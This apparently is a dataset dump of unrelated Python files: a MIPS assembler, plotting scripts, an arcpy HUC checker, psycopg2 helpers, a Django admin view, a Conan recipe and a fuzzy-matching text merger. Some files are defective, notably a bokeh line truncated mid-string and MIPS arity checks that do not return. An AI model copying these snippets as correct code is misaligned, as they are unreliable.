        return bin(int(token))[2:].zfill(width)

    def word(self, input):
        "Converts a MIPS 'word' command into binary machine code (as a string)."
        if len(input) != 1:
            self.result.append("".join(map(str, input)))
        self.result.append(self._field(input[0], 32))

    def add(self, input):
        "Converts a MIPS 'add' command into binary machine code (as a string)."
        if len(input) != 3:
            self.result.append("".join(map(str, input)))
        # R-type: opcode 0 | rs | rt | rd | shamt 0 | funct 100000
        self.result.append("000000" + self._field(input[1][1:-1]) + self._field(input[2][1:]) + self._field(input[0][1:-1]) + "00000100000")

    def sub(self, input):
        "Converts a MIPS 'sub' command into binary machine code (as a string)."
        if len(input) != 3:
            self.result.append("".join(map(str, input)))
        self.result.append("000000" + self._field(input[1][1:-1]) + self._field(input[2][1:]) + self._field(input[0][1:-1]) + "00000100010")

    def mult(self, input):
        "Converts a MIPS 'mult' command into binary machine code (as a string)."
        if len(input) != 2:
            self.result.append("".join(map(str, input)))
        self.result.append("000000" + self._field(input[0][1:-1]) + self._field(input[1][1:]) + "00000" + "00000011000")

    def multu(self, input):
        "Converts a MIPS 'multu' command into binary machine code (as a string)."
        if len(input) != 2:
            self.result.append("".join(map(str, input)))
        self.result.append("000000" + self._field(input[0][1:-1]) + self._field(input[1][1:]) + "00000" + "00000011001")

    def div(self, input):
        "Converts a MIPS 'div' command into binary machine code (as a string)."
        if len(input) != 2:
            self.result.append("".join(map(str, input)))
        self.result.append("000000" + self._field(input[0][1:-1]) + self._field(input[1][1:]) + "00000" + "00000011010")

    def divu(self, input):
        "Converts a MIPS 'divu' command into binary machine code (as a string)."
        if len(input) != 2:
            self.result.append("".join(map(str, input)))
        self.result.append("000000" + self._field(input[0][1:-1]) + self._field(input[1][1:]) + "00000" + "00000011011")

    def mfhi(self, input):
        "Converts a MIPS 'mfhi' command into binary machine code (as a string)."
        if len(input) != 1:
            self.result.append("".join(map(str, input)))
        self.result.append('0' * 16 + self._field(input[0][1:]) + "00000010000")

    def mflo(self, input):
        "Converts a MIPS 'mflo' command into binary machine code (as a string)."
        if len(input) != 1:
            self.result.append("".join(map(str, input)))
        self.result.append('0' * 16 + self._field(input[0][1:]) + "00000010010")

    def lis(self, input):
        "Converts a MIPS 'lis' command into binary machine code (as a string)."
        if len(input) != 1:
            self.result.append("".join(map(str, input)))
        self.result.append('0' * 16 + self._field(input[0][1:]) + "00000010100")

    def beq(self, input):
        "Converts a MIPS 'beq' command into binary machine code (as a string)."
        if len(input) != 3:
            self.result.append("".join(map(str, input)))
        self.result.append("000100" + self._field(input[0][1:-1]) + self._field(input[1][1:-1]) + self._field(input[2], 16))

    def bne(self, input):
        "Converts a MIPS 'bne' command into binary machine code (as a string)."
        if len(input) != 3:
            self.result.append("".join(map(str, input)))
        self.result.append("000101" + self._field(input[0][1:-1]) + self._field(input[1][1:-1]) + self._field(input[2], 16))

    def jr(self, input):
        "Converts a MIPS 'jr' command into binary machine code (as a string)."
        if len(input) != 1:
            self.result.append("".join(map(str, input)))
        self.result.append('0' * 6 + self._field(input[0][1:]) + '0' * 17 + "1000")
if __name__ == "__main__":
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--line', type=str, help="input a line of MIPS code.")
    arg_parser.add_argument('--in_file', type=str, help="txt file containing MIPS instructions")
    arg_parser.add_argument('--out_file', type=str, help='output to a file instead of std')
    args = arg_parser.parse_args()
    parser = Parser()

    def translate(tokens):
        """Dispatch one tokenized instruction to the matching Parser method."""
        # Strip the leading '.' from '.word' so getattr() finds Parser.word.
        if tokens[0] == '.word':
            tokens[0] = tokens[0][1:]
        func = getattr(parser, tokens[0].lower())
        func(tokens[1:])

    if args.line:
        translate(args.line.split(' '))
    if args.in_file:
        # Fix: the input handle is now closed deterministically (it was
        # opened and never closed); dispatch code deduplicated via translate().
        with open(args.in_file, 'r') as f_in:
            for line in f_in:
                translate(line.split(' '))
    if args.out_file:
        # Fix: output file is flushed/closed via the context manager.
        with open(args.out_file, 'w+') as f:
            for row in parser.result:
                f.write('.word 0x' + str(hex(int(row, 2)))[2:].zfill(8) + '\n')
    else:
        for row in parser.result:
            print('.word 0x' + str(hex(int(row, 2)))[2:].zfill(8))
12,458 | 553dccb95df22fa23499923c9e0cf1b9e3d9737a | import matplotlib.pyplot as plt
from matplotlib.pyplot import cm
import numpy as np
# Figure with tick marks on all four sides, pointing inward.
f = plt.figure()
ax = f.add_subplot(111)
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.tick_params(which='both', direction='in', labelsize=14)
# Baseline: V4 run time in seconds (22 min 11 s).
V4 = (22*60+11)*1.0
# Speedups of V7 and V10 relative to V4 at 1, 2, 4 and 8 threads;
# each run time is minutes*60 + fractional seconds.
V7 = V4/(np.array([15, 14, 15, 21])*60 + np.array([0.055, 0.854, 0.432, 0.746]))
V10 = V4/(np.array([14, 14, 13, 18])*60 + np.array([0.857, 0.857, 0.652, 0.87]))
plt.plot([1, 2, 4, 8], V10, ".", label="V10")
plt.plot([1, 2, 4, 8], V7, "x", label="V7")
plt.xlabel("Nombre de threads", size=20)
plt.ylabel("SpeedUp (par rapport à V4)", size=20)
plt.grid()
plt.legend(loc=2, fontsize=12)
plt.show()
|
12,459 | 8f23895d5d44afe69b8b4bd80c78a3547d9751b2 | import traceback
import os
import sys
import arcpy
from code_library.common import log
from code_library.common import geospatial
from code_library.common import network # need it for network_end_hucs
# Tool bootstrap: logging plus the three script parameters (input layer,
# check method, output geodatabase).
log.init(arc_script=True,html=True)
layer = arcpy.GetParameterAsText(0)
method = arcpy.GetParameterAsText(1)
output_gdb = arcpy.GetParameterAsText(2)
if not arcpy.Exists(layer):
    # NOTE(review): log.error does not appear to stop the script here —
    # execution continues with a nonexistent layer; confirm whether it
    # should exit instead.
    log.error("Input layer doesn't exist. Problemo cowboy. Please specify some input features and make sure they exist.")
# Lookup lists populated later from the copied feature class.
huc12s_index = []
huc10s_index = []
marked_as_bad = []
class huc_issue:
    """Record of a suspect HUC and the reason(s) it was flagged.

    ``reason`` and ``issue_notes`` are lists because one HUC can end up
    here for several independent problems.
    """
    def __init__(self, huc_12=None, reason=None, issue_notes=None, huc_10=None, ds=None, ds10=None):
        self.huc_12 = huc_12
        self.huc_10 = huc_10
        self.hu_12_ds = ds
        self.hu_10_ds = ds10
        self.reason = [reason]
        self.issue_notes = [issue_notes]
issues_index = {}  # HUC_12 id -> huc_issue, so repeat findings merge into one record
def check_huc_from_row(row):
    '''Runs a series of checks on the attributes of one HUC record.

    Three checks: (1) the downstream HUC_12 exists in this dataset,
    (2) the downstream HUC_10 exists, (3) the downstream HUC_12 id sits
    inside either the current HUC_10 or the downstream HUC_10.
    Findings are appended to marked_as_bad and merged via issues_index.
    Returns 0 for records with no HUC_12 id, otherwise None.
    '''
    global marked_as_bad
    global issues_index
    huc_12_id = row.getValue("HUC_12") # cache it - we'll use it a bunch right now
    huc_12_ds = row.getValue("HU_12_DS")
    if not huc_12_id:  # fix: reuse the cached value (was a redundant second getValue)
        return 0
    if huc_12_ds not in huc12s_index and huc_12_ds not in network.network_end_hucs:
        issue = huc_issue(huc_12_id,"ds_dne","Downstream HUC_12 does not exist in this dataset")
        marked_as_bad.append(issue)
        issues_index[huc_12_id] = issue
    if row.getValue("HU_10_DS") not in huc10s_index and row.getValue("HU_10_DS") not in network.network_end_hucs:
        message = "Downstream HUC_10 does not exist in this dataset"
        reason = "10_ds_dne"
        if huc_12_id in issues_index:
            issues_index[huc_12_id].reason.append(reason)
            issues_index[huc_12_id].issue_notes.append(message)
        else:
            issue = huc_issue(huc_12_id,reason,message,huc_10 = row.getValue("HUC_10"))
            marked_as_bad.append(issue)
            issues_index[huc_12_id] = issue
    if row.getValue("HUC_10") not in huc_12_ds and row.getValue("HU_10_DS") not in huc_12_ds:
        # Fix: corrected garbled message text ("nay of thos" -> "any of those").
        message = "Downstream HUC_12 is not within the current HUC_10 or the downstream HUC_10 - possible problem with any of those attributes"
        reason = "ds_not_within"
        if huc_12_id in issues_index:
            issues_index[huc_12_id].reason.append(reason)
            issues_index[huc_12_id].issue_notes.append(message)
        else:
            issue = huc_issue(huc_12_id,reason,message,huc_10 = row.getValue("HUC_10"))
            marked_as_bad.append(issue)
            issues_index[huc_12_id] = issue
def check_hucs(feature_class):
    # TODO: attribute-check driver over the whole feature class - not yet implemented.
    pass
def check_boundary_from_row(row, feature_layer):
    '''takes the huc, gets the huc 12, does a boundary touches new selection on the feature_layer - returns a huc_issue or True'''
    # NOTE(review): unimplemented - the docstring above is currently the entire body.
def check_boundaries(feature_class):
    '''runs check boundary from row for everything else.'''
    # TODO: not yet implemented.
    pass
def load_features(feature_class):
    '''Copy the input features to a scratch workspace and return the copy's path.

    Tries an in-memory workspace first; on failure falls back to a scratch
    file geodatabase on disk, and exits the script if that fails too.
    '''
    temp_features = "in_memory/huc_layer"
    try:
        arcpy.Copy_management(feature_class,temp_features)
    except Exception:  # fix: no longer a bare except (kept Ctrl-C deliverable)
        log.warning("Couldn't copy features to memory - trying to copy to disk")
        original_except = traceback.format_exc()  # keep the first failure for reporting
        try:
            temp_features = geospatial.generate_gdb_filename(return_full = True)
            arcpy.Copy_management(feature_class,temp_features)
        except Exception:
            # Fix: corrected message typo ("Cant's" -> "Can't").
            log.error("Can't make a copy of the features - %s" % original_except)
            sys.exit()
    log.write("Features copied",True)
    return temp_features
temp_features = load_features(layer)

# Build the HUC_12 / HUC_10 id indexes used by the per-row checks.
huc_curs = arcpy.SearchCursor(temp_features)
for row in huc_curs:
    huc12s_index.append(row.getValue("HUC_12"))
    huc10s_index.append(row.getValue("HUC_10"))
del huc_curs  # release the cursor's locks on the data

check_hucs(temp_features)
if method == "Thorough":
    check_boundaries(temp_features)
# now copy the features out
# and then set the output
# Fix: `output_layer` was never defined anywhere, so this line raised
# NameError at runtime. Return the checked scratch copy for now.
# TODO(review): write the flagged results into output_gdb once
# check_hucs/check_boundaries are implemented, and output that instead.
arcpy.SetParameter(3,temp_features)
|
12,460 | 737fd7c52f40723516ab407386d5bcaa31de4840 | import psycopg2
import yaml
import os
def connect():
    """Open a new psycopg2 connection using settings from config/db.yml.

    The YAML file must define: database, user, password, host, port.
    (Removed the dead `config = {}` initializer - it was always overwritten.)
    """
    yml_path = os.path.join(os.path.dirname(__file__), '../../config/db.yml')
    with open(yml_path, 'r') as file:
        config = yaml.load(file, Loader=yaml.FullLoader)
    return psycopg2.connect(dbname=config['database'],
                            user=config['user'],
                            password=config['password'],
                            host=config['host'],
                            port=config['port'])
def execute_sql_file(path):
    """Execute the SQL script at `path` (relative to the project root) and commit.

    Fix: the connection is now closed even when reading or executing the
    script raises (previously it leaked on any exception).
    """
    full_path = os.path.join(os.path.dirname(__file__), f'../../{path}')
    connection = connect()
    try:
        cursor = connection.cursor()
        with open(full_path, "r") as file:
            cursor.execute(file.read())
        connection.commit()
    finally:
        connection.close()
def execute_get_all(sql, args={}):
    """Run a query and return all rows as a list of tuples.

    `args={}` is kept as the default deliberately (it is never mutated, and
    psycopg2 treats {} and None differently for '%' handling in the query).
    Fix: the connection is closed even if the query raises.
    """
    connection = connect()
    try:
        cursor = connection.cursor()
        cursor.execute(sql, args)
        return cursor.fetchall()
    finally:
        connection.close()
def execute_get_one(sql, args={}):
    """Run a query and return the first row as a tuple (or None if no rows).

    `args={}` kept as the default (never mutated; {} and None behave
    differently in psycopg2 parameter handling).
    Fix: the connection is closed even if the query raises.
    """
    connection = connect()
    try:
        cursor = connection.cursor()
        cursor.execute(sql, args)
        return cursor.fetchone()
    finally:
        connection.close()
def execute_commit(sql, args={}):
    """Execute a statement and commit it.

    Returns cursor.execute()'s result - psycopg2 documents this as None -
    kept only for interface compatibility with existing callers.
    Fix: the connection is closed even if the statement raises.
    """
    connection = connect()
    try:
        cursor = connection.cursor()
        result = cursor.execute(sql, args)
        connection.commit()
        return result
    finally:
        connection.close()
|
12,461 | 270d09f67633d22cc6ed8e355f258f1954897979 | import matplotlib.pyplot as plt
def plot_matrix(M, save=False):
    """Render matrix M as a heatmap; if `save` is a path, also write it to disk.

    Bug fix: savefig() now runs *before* show(). In the original order the
    figure is typically emptied once the interactive show() window is
    closed, so the saved image came out blank.
    """
    plt.imshow(M, interpolation='nearest', aspect='auto', cmap='jet')
    if save:
        plt.savefig(save)
    plt.show()
|
class Solution(object):
    def removeElement(self, nums, val):
        """
        Remove every occurrence of `val` from `nums` in place by swapping
        matches out to the shrinking tail; return the count of kept elements.
        :type nums: List[int]
        :type val: int
        :rtype: int
        """
        if not nums:
            return 0
        lo = 0
        hi = len(nums) - 1
        while lo < hi:
            if nums[lo] != val:
                lo += 1
                continue
            # Swap the run of matches at `lo` toward the tail.
            while lo < hi and nums[lo] == val:
                nums[lo], nums[hi] = nums[hi], nums[lo]
                hi -= 1
        # lo == hi here: the element under the pointers decides the count.
        return lo if nums[lo] == val else lo + 1
if __name__ == '__main__':
    solu = Solution()
    # Fix: Python 3-compatible print call (the original used the Python 2
    # print statement); with a single argument the parenthesized form
    # prints identically under Python 2 as well.
    # Expected output: 0 - every element equals val, so none survive.
    print(solu.removeElement([1, 1, 1, 1], 1))
|
12,463 | 6cd846faf7b04a78097d17f3595c041d9959ffab | # -*- coding: utf-8 -*-
from platinumegg.app.cabaret.views.adminhandler import AdminHandler
from defines import Defines
import settings
from platinumegg.app.cabaret.util.api import BackendApi
from platinumegg.app.cabaret.util.alert import AlertCode
from platinumegg.app.cabaret.models.Memories import MemoriesMaster
class Handler(AdminHandler):
    """Admin page: movie view counts."""
    def process(self):
        """Fetch the view-count list and render the admin HTML template,
        showing a warning alert when the list is empty."""
        movieviewlist = self.procMovieView()
        if not movieviewlist:
            self.putAlertToHtmlParam(u'見つかりませんでした', AlertCode.WARNING)
        self.html_param['movieviewlist'] = movieviewlist
        self.writeAppHtml('infomations/view_movieview')
    def procMovieView(self):
        """Load the movie view counts from the read-only DB and convert
        them into HTML-embeddable objects."""
        model_mgr = self.getModelMgr()
        movieviewlist = BackendApi.get_movieview_list(model_mgr, using=settings.DB_READONLY)
        obj_movieviewlist = self.makeMovieViewObjList(movieviewlist)
        return obj_movieviewlist
    def makeMovieViewObjList(self, movieviewlist):
        """Convert view-count rows into dicts for HTML embedding, joining
        each row to its MemoriesMaster record by id."""
        model_mgr = self.getModelMgr()
        master_idlist = [movieview.id for movieview in movieviewlist]
        masters = BackendApi.get_model_dict(model_mgr, MemoriesMaster, master_idlist, using=settings.DB_READONLY)
        obj_movieviewlist = []
        for movieview in movieviewlist:
            obj = self.makeMovieViewObj(movieview, masters.get(movieview.id))
            obj_movieviewlist.append(obj)
        return obj_movieviewlist
    def makeMovieViewObj(self, movieview, memoriesmaster):
        """Build the HTML dict for one row; falls back to u'不明'
        ("unknown") when the master record is missing."""
        if memoriesmaster:
            name = memoriesmaster.name
            text = memoriesmaster.text
        else:
            name = u'不明'
            text = u'不明'
        return {
            'id' : movieview.id,
            'name' : name,
            'text' : text,
            'cnt' : movieview.cnt,
        }
def main(request):
    # URL-conf entry point; delegates the request to Handler.
    return Handler.run(request)
|
12,464 | 508347317fa73dd398067027657dec618e7acd30 | from pandas_datareader import data
import datetime
import fix_yahoo_finance as yf
yf.pdr_override()
from bokeh.plotting import figure, show, output_file
from bokeh.embed import components
from bokeh.resources import CDN
# Date window for the GOOG daily price download.
start=datetime.datetime(2015,11,1)
end=datetime.datetime(2016,3,10)
df=data.get_data_yahoo(tickers="GOOG", start=start, end=end)
def inc_dec(c, o):
    """Classify a candle: 'Increase' if close > open, 'Decrease' if
    close < open, otherwise 'Equal'."""
    if c > o:
        return "Increase"
    if c < o:
        return "Decrease"
    return "Equal"
df["Status"]=[inc_dec(c,o) for c, o in zip(df.Close,df.Open)]
df["Middle"]=(df.Open+df.Close)/2
df["Height"]=abs(df.Close-df.Open)
p=figure(x_axis_type='datetime', width=1000, height=300, sizing_mode="scale_width")
p.title.text="Candlestick Chart"
p.grid.grid_line_alpha=0.3
hours_12=12*60*60*1000
p.segment(df.index, df.High, df.index, df.Low, color="Black")
p.rect(df.index[df.Status=="Increase"],df.Middle[df.Status=="Increase"],
hours_12, df.Height[df.Status=="Increase"],fill_color="#CCFFFF",line_color="black")
p.rect(df.index[df.Status=="Decrease"],df.Middle[df.Status=="Decrease"],
hours_12, df.Height[df.Status=="Decrease"],fill_color="#FF3333",line_color="blac
# to embed graph code to the website
script1, div1 = components(p)
# get the cdns for bokeh graphs to put in the script link
# cdn_js=CDN.js_files # gives list of javascript files
# cdn_css=CDN.css_files # gives list of css files
# while embedding the graph to your website you don't need below 2 lines
output_file("CS.html")
show(p)
|
12,465 | 47389c1dc07c3e49968a3c2e58258a0642f93486 | #coding=utf-8
import requests
# Query the ipip.net free geolocation API for a fixed IP, 1003 times.
# NOTE(review): Python 2 code (xrange / print statement); there is no delay
# or error handling between requests - presumably a quick availability or
# rate-limit probe; confirm intent before reusing.
for i in xrange(1003):
    r= requests.get("http://freeapi.ipip.net/118.28.8.8")
    print r.text
|
12,466 | c5cce2008acf99be7559809b3c199846c0009384 | from conans import ConanFile, CMake, tools
import os
import shutil
class FluidSynthConan(ConanFile):
    """Conan recipe for FluidSynth 2.0.5.

    Every optional feature is described once as a CustomOption; the class
    attributes `options`/`default_options`, the platform filtering in
    config_options(), the conditional requirements() and the CMake
    definitions in _configure_cmake() are all derived from that single list.
    """
    class CustomOption(object):
        """One recipe option: its values/default, the matching CMake
        'enable-*' flag, the platforms it applies to, and any conan
        requirements it pulls in when enabled."""
        def __init__(self, name,
                     values=None,
                     default=None,
                     cmake_name=None,
                     platforms=None,
                     platforms_blacklist=None,
                     requirements=None):
            self._name = name
            self._values = values or [True, False]
            self._default = default or False
            self._cmake_name = cmake_name or name
            self._cmake_name = "enable-" + self._cmake_name
            self._platforms_whitelist = platforms
            self._platforms_blacklist = platforms_blacklist
            self._requirements = requirements or []
        @property
        def name(self):
            return self._name
        @property
        def cmake_name(self):
            return self._cmake_name
        @property
        def values(self):
            return self._values
        @property
        def default(self):
            return self._default
        @property
        def requirements(self):
            return self._requirements
        def check_platform(self, the_os):
            # Whitelist takes precedence over blacklist; with neither set,
            # the option is available on every platform.
            if self._platforms_whitelist:
                return the_os in self._platforms_whitelist
            elif self._platforms_blacklist:
                return the_os not in self._platforms_blacklist
            else:
                return True
    name = "fluidsynth"
    version = "2.0.5"
    description = "Software synthesizer based on the SoundFont 2 specifications"
    topics = ("conan", "fluidsynth", "soundfont", "midi", "synthesizer")
    url = "https://github.com/bincrafters/conan-fluidsynth"
    homepage = "http://www.fluidsynth.org/"
    license = "LGPL-2.1-only"
    exports_sources = ["CMakeLists.txt"]
    generators = "cmake", "pkg_config"
    settings = "os", "arch", "compiler", "build_type"
    # Single source of truth for every feature toggle (see class docstring).
    conan_options = [CustomOption("shared"),
                     CustomOption("fPIC", default=True, platforms_blacklist=["Windows"]),
                     CustomOption("floats"),
                     CustomOption("fpe-check"),
                     CustomOption("trap-on-check"),
                     CustomOption("portaudio", requirements=["portaudio/v190600.20161030@bincrafters/stable"]),
                     CustomOption("aufile"),
                     CustomOption("dbus"),
                     CustomOption("ipv6", default=True),
                     CustomOption("jack"),
                     CustomOption("ladspa"),
                     CustomOption("libsndfile"),
                     CustomOption("midishare"),
                     CustomOption("opensles"),
                     CustomOption("oboe"),
                     CustomOption("network", default=True),
                     CustomOption("oss"),
                     CustomOption("dsound", default=True, platforms=["Windows"]),
                     CustomOption("waveout", default=True, platforms=["Windows"]),
                     CustomOption("winmidi", default=True, platforms=["Windows"]),
                     CustomOption("sdl2", requirements=["sdl2/2.0.9@bincrafters/stable"]),
                     CustomOption("pkgconfig", default=True),
                     CustomOption("pulseaudio"),
                     CustomOption("readline", requirements=["readline/7.0@bincrafters/stable"]),
                     CustomOption("threads"),
                     CustomOption("lash", platforms=["Linux", "FreeBSD"]),
                     CustomOption("alsa", platforms=["Linux", "FreeBSD"], requirements=["libalsa/1.1.9"]),
                     CustomOption("systemd", platforms=["Linux"]),
                     CustomOption("coreaudio", default=True, platforms=["Macos"]),
                     CustomOption("coremidi", default=True, platforms=["Macos"]),
                     CustomOption("framework", platforms=["Macos"])]
    options = {o.name: o.values for o in conan_options}
    default_options = {o.name: o.default for o in conan_options}
    _source_subfolder = "source_subfolder"
    _build_subfolder = "build_subfolder"
    requires = "glib/2.58.3@bincrafters/stable"
    def configure(self):
        # C library: the C++ runtime settings are irrelevant to the package id.
        del self.settings.compiler.libcxx
        del self.settings.compiler.cppstd
    def build_requirements(self):
        if self.options.pkgconfig:
            if not tools.which("pkg-config"):
                self.build_requires("pkg-config_installer/0.29.2@bincrafters/stable")
    def config_options(self):
        # Drop options that do not apply to the target OS.
        for o in self.conan_options:
            if not o.check_platform(self.settings.os):
                self.options.remove(o.name)
    def requirements(self):
        # Pull in the extra requirements of every enabled, applicable option.
        for o in self.conan_options:
            if o.check_platform(self.settings.os):
                if getattr(self.options, o.name):
                    for r in o.requirements:
                        self.requires(r)
    def source(self):
        tools.get(**self.conan_data["sources"][self.version])
        extracted_dir = self.name + "-" + self.version
        os.rename(extracted_dir, self._source_subfolder)
    def _configure_cmake(self):
        """Map every option to its 'enable-*' CMake definition and configure."""
        cmake = CMake(self)
        cmake.definitions["enable-debug"] = self.settings.build_type == "Debug"
        cmake.definitions["BUILD_SHARED_LIBS"] = self.options.shared # fluidsynth forces to True by default
        cmake.definitions["enable-tests"] = False
        cmake.definitions["LIB_INSTALL_DIR"] = "lib" # https://github.com/FluidSynth/fluidsynth/issues/476
        for o in self.conan_options:
            if o.check_platform(self.settings.os):
                cmake.definitions[o.cmake_name] = getattr(self.options, o.name)
            else:
                cmake.definitions[o.cmake_name] = False
        cmake.configure(build_folder=self._build_subfolder,
                        source_folder=self._source_subfolder)
        return cmake
    def _patch_files(self):
        """Strip upstream build quirks that conflict with conan's toolchain."""
        cmakelists = os.path.join(self._source_subfolder, "CMakeLists.txt")
        # remove some quirks, let conan manage them
        tools.replace_in_file(cmakelists, '-fsanitize=undefined', '')
        tools.replace_in_file(cmakelists, 'string ( REGEX REPLACE "/MD" "/MT" ${flag_var} "${${flag_var}}" )', '')
        tools.replace_in_file(cmakelists, 'set ( CMAKE_POSITION_INDEPENDENT_CODE ${BUILD_SHARED_LIBS} )', '')
        # FIXME : components
        shutil.copy("glib.pc", "glib-2.0.pc")
        shutil.copy("glib.pc", "gthread-2.0.pc")
    def build(self):
        self._patch_files()
        with tools.environment_append({"PKG_CONFIG_PATH": self.source_folder}):
            cmake = self._configure_cmake()
            cmake.build()
    def package(self):
        self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
        with tools.environment_append({"PKG_CONFIG_PATH": self.source_folder}):
            cmake = self._configure_cmake()
            cmake.install()
        tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
    def package_info(self):
        if self.settings.compiler == "Visual Studio":
            self.cpp_info.libs = ["fluidsynth" if self.options.shared else "libfluidsynth"]
        else:
            self.cpp_info.libs = ["fluidsynth"]
        if self.settings.os == "Macos":
            if self.options.coreaudio:
                self.cpp_info.frameworks.extend(
                    ["CoreAudio", "AudioToolbox", "CoreServices"])
            if self.options.coremidi:
                self.cpp_info.frameworks.append("CoreMidi")
            self.cpp_info.sharedlinkflags = self.cpp_info.exelinkflags
        if self.settings.os == "Windows":
            if self.options.network:
                self.cpp_info.system_libs.append("ws2_32")
            if self.options.dsound:
                self.cpp_info.system_libs.append("dsound")
            if self.options.winmidi:
                self.cpp_info.system_libs.append("winmm")
|
12,467 | da1bcdc2cd701a758b71e28b701e4d3e7a321ef5 | import os
import glob
from glob import glob
import pandas as pd
from fuzzywuzzy import fuzz
from fuzzywuzzy import process
import enchant
d = enchant.Dict("en_US")
# NOTE(review): `path` is assigned but never used below.
path="/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/"
dirs_names=os.listdir("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_mp4/")
# For every ad directory: match each .avi clip name against the rows of that
# directory's spreadsheet (fuzzy title match > 90), then write the matched
# row's description - filtered to English-dictionary words, one per line -
# into <clip-index>_desc.txt.
for p in dirs_names:
    vs=os.listdir("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_avi/"+p+"/t")
    vids=[]
    for v in vs:
        if ".avi" in v:
            n=v.replace(".avi","")
            vids.append(n)
    df=pd.read_excel("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_mp4/"+p+"/"+p+".xlsx",index_col=False)
    name_list=list(df["title"])
    desc_list=list(df["description"])
    desc_=[]  # NOTE(review): populated nowhere - appears to be dead.
    for v in vids:
        for name in range(len(name_list)):
            if fuzz.ratio(v ,name_list[name])>90:
                # Normalize separators to spaces before splitting into words.
                spi=str(desc_list[name]).replace("\n"," ")
                spi=spi.replace("—"," ")
                spi=spi.replace("-"," ")
                spi=spi.replace("\t"," ")
                spi=spi.replace("—"," ")
                spi_list=spi.split(" ")
                with open("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_all_data/"+p+"/"+str(vids.index(v))+"_desc.txt","w") as f:
                    for sp in spi_list:
                        if sp!="" and sp!=" ":
                            if d.check(sp):
                                f.write(sp+"\n")
def combine(t1, t3, t4=0, t2=0):
    """Concatenate t1 (plus optional t2 and t4) into the output file t3.

    Keeps the original behaviour of echoing the primary file to stdout and
    writing a separator newline after each section even when the optional
    inputs are absent (falsy).
    """
    with open(t1) as src:
        primary = src.read()
    secondary = ""
    if t2:
        with open(t2) as src:
            secondary = src.read()
    tertiary = ""
    if t4:
        with open(t4) as src:
            tertiary = src.read()
    # Echo the primary content, as the original did.
    print(primary)
    # Merging 2 files: section 1, then sections 2 and 3, newline-separated.
    merged = primary + "\n" + secondary + "\n" + tertiary + "\n"
    with open(t3, 'w') as dst:
        dst.write(merged)
# Merge each clip's *_desc.txt with its other modality files (OCR text,
# audio transcript, detected objects) into the seven v1..v7 combinations.
for p in dirs_names:
    print(p)
    try:
        new_names=[]
        vd=[y for x in os.walk("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_all_data/"+p+"/") for y in glob(os.path.join(x[0], '*.txt'))]
        # Strip every known suffix so only the bare clip ids remain.
        for i in vd:
            s=i.replace("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_all_data/"+p+"/","")
            s=s.replace("_audio_to_txt.txt","")
            s=s.replace("_desc.txt","")
            s=s.replace("_objects.txt","")
            s=s.replace("_text.txt","")
            s=s.replace("_v1.txt","")
            s=s.replace("_v2.txt","")
            s=s.replace("_v3.txt","")
            s=s.replace("_v4.txt","")
            s=s.replace("_v5.txt","")
            s=s.replace("_v6.txt","")
            s=s.replace("_v7.txt","")
            new_names.append(s)
        set_data=list(set(new_names))
        #print(set_data)
        # NOTE(review): the paths below use ".../R2_ads/..." while the code
        # above uses ".../R2_/ads/..." - confirm which layout is correct.
        for n in set_data:
            #V1
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v1.txt")
            #V2
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v2.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_text.txt")
            #V3
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v3.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_audio_to_txt.txt")
            #V4
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v4.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_objects.txt")
            #V5
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v5.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_text.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_audio_to_txt.txt")
            #V6
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v6.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_text.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_objects.txt")
            #V7
            combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v7.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_audio_to_txt.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_objects.txt")
    except :
        # NOTE(review): bare except hides the real error, and `n` is
        # undefined here if the failure happened before the inner loop ran
        # (that would raise a secondary NameError).
        print(str(p)+str(" "+n))
|
# Demultiplex evil2.gfx: the file interleaves five images byte-by-byte,
